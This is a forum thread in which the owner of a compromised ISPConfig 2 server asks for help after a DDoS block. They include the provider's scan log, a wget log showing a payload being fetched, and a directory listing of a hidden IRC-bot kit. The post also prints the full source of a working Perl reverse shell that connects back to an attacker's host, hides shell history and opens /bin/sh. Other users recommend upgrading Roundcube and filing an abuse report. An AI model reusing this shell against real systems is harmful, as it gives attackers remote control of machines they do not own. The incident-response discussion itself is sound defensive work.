Server Hacked ispconfig leak?

Hi,

My server was blocked by my provider, here's the log of their detection program :

Code:

--------------------------- LOGS DE SCAN ---------------------------

DDOS attacks with 46bytes pkts

startime endtime scr:port dst:port
----------------------------------------------------------------------------------------------
2009-03-31 14:51:25 2009-03-31 14:51:26 x.x.x.x:47700 88.84.141.189:0
2009-03-31 14:51:26 2009-03-31 14:51:28 x.x.x.x:47700 88.84.141.189:0
2009-03-31 14:51:28 2009-03-31 14:51:45 x.x.x.x:47700 88.84.141.189:0
2009-03-31 14:51:45 2009-03-31 14:51:50 x.x.x.x:47700 88.84.141.189:0
2009-03-31 14:51:50 2009-03-31 14:51:53 x.x.x.x:47700 88.84.141.189:0
2009-03-31 14:51:53 2009-03-31 14:52:18 x.x.x.x:47700 88.84.141.189:0
2009-03-31 14:52:38 2009-03-31 14:53:12 x.x.x.x:47700 88.84.141.189:0
2009-03-31 14:53:12 2009-03-31 14:53:18 x.x.x.x:47700 88.84.141.189:0
2009-03-31 14:53:18 2009-03-31 14:53:21 x.x.x.x:47700 88.84.141.189:0
2009-03-31 14:53:21 2009-03-31 14:53:23 x.x.x.x:47700 88.84.141.189:0
2009-03-31 14:53:23 2009-03-31 14:53:26 x.x.x.x:47700 88.84.141.189:0

Here, x.x.x.x is my ip address.

in the rescue mode (ssh only with no other services running), i was able to connect to the server and here's what i found in the /root/ispconfig/httpd/logs/error_log :

Code:

--14:45:44--  http://alecsandru.ilive.ro/nc.jpg
           => `nc.jpg'
Resolving alecsandru.ilive.ro... 86.55.1.30
Connecting to alecsandru.ilive.ro|86.55.1.30|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 872 [image/jpeg]

    0K                                                       100%  125.66 MB/s

14:45:44 (125.66 MB/s) - `nc.jpg' saved [872/872]

when I search for the nc.jpg it was not found anywhere in my server, probably was deleted by the hacker.

but when i download it from http://alecsandru.ilive.ro/, here what it's look like

Code:

#!/usr/bin/perl
use Socket;
print "\n[~] Incerc sa fac legatura =)\n";
$host = $ARGV[0];
$port = 8080;
if ($ARGV[1]) {
  $port = $ARGV[1];
}
$proto = getprotobyname('tcp') || die("[-] Nu merge treaba\n\n");
socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("[-] Eroare socket\n\n");
my $target = inet_aton($host);
if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
  die("[-] Conecktback Esuat\n\n");
}
if (!fork( )) {
  open(STDIN,">&SERVER");
  open(STDOUT,">&SERVER");
  open(STDERR,">&SERVER");
  print "[+] Conectback by sTrEs ... private version 
=)\n"; 
  system("unset HISTFILE; unset HISTSAVE ; uname -a ; id ; w ; echo \"[+] Time to burn...\";echo \"[+] Do not messing press Ctrl C\"; /bin/sh -i");
  exit(0);
}
print "[+] Conectback Reusit !\n\n";

Backdoor for sure

chkrootkit found nothing, but while searching i found a strange folder ".." in /var/tmp, it was hidded but its name so i can't notice it, but I Do

in this folder i found ".shell" folder and in it :

Code:

drwx------ 5 admispconfig admispconfig   4096 Apr  1 15:45 .
drwxr-xr-x 3 admispconfig admispconfig   4096 Apr  1 16:31 ..
-rw-r--r-- 1 admispconfig admispconfig     59 Mar 31 14:50 JohnDoe.seen
-rwxr-xr-x 1 admispconfig admispconfig    118 Mar 31 14:46 LinkEvents
drwxr-xr-x 3 admispconfig admispconfig   4096 Oct 11  2002 flood
-rwx--x--x 1 admispconfig admispconfig 488645 Jan 13  2003 httpd
-rwx--x--x 1 admispconfig admispconfig  22935 Oct 10  2000 mech.help
-rwxr-xr-x 1 admispconfig admispconfig   1084 Mar  8  2002 mech.levels
-rw------- 1 admispconfig admispconfig      6 Mar 31 14:46 mech.pid
-rwxr-xr-x 1 admispconfig admispconfig   1406 Mar 13 22:49 mech.set
drwx--x--x 2 admispconfig admispconfig   4096 Nov  8  2000 randfiles
drwx--x--x 2 admispconfig admispconfig   4096 Mar  8  2002 src
-rwxr-xr-x 1 admispconfig admispconfig     69 Mar 13 22:50 x.users

the folder has admispconfig privileges as you can see.

Can you please tell me what to do next?

just delete the folder? clean ispconfig? maybe upgrade to 3, will this can solve the problem for sure?

 

Thanx till for the reply.

Yes i have installed the 0.1-stable version of roundcube months ago

 

And send an abuse report to [email protected]; they usually take this seriously.
alecsandru.ilive.ro is a website hosted for free on their servers.

 

since the hacker was able to take admispconfig priveleges, it will be safer if i uninstall ispconfig then reinstall version 3, what do you think about that Till?
or do you think that i'll be good with this (erasing /tmp, upgrading ispconfig and roundcube)

 

thanx deconectat,

i'have just send them an email about that, hope they will act soon.

 

thx

Thx Till,

I have cleaned the server, installed latest ispconfig2 (ISPConfig-2.2.31) and upgraded to the latest release of roundcube.

thx again

 

they used netcat..what about roundcube 2a?

Looks like they used a netcat like method to spawn the shell.

Glad I upgraded roundcube I didnt know about this vulnerability.

What about Roundube version 2a?

I have roundcube 2a installed but have hesitated installing 0.2.1 because i read a post that doesnt transfer over the sqlite user authentication data...?

I simply cannot recrete every user email account if that's what 0.2.1 requires...however I'd be willing to if roundube 2a is exploitable...

Anybody know if this vulnerability is in roundube 2a release for ispconfig as well?

Thanks

Khayjake

 

Hello Till,

About the same problem I have written you an PM.

Best regards

HahniP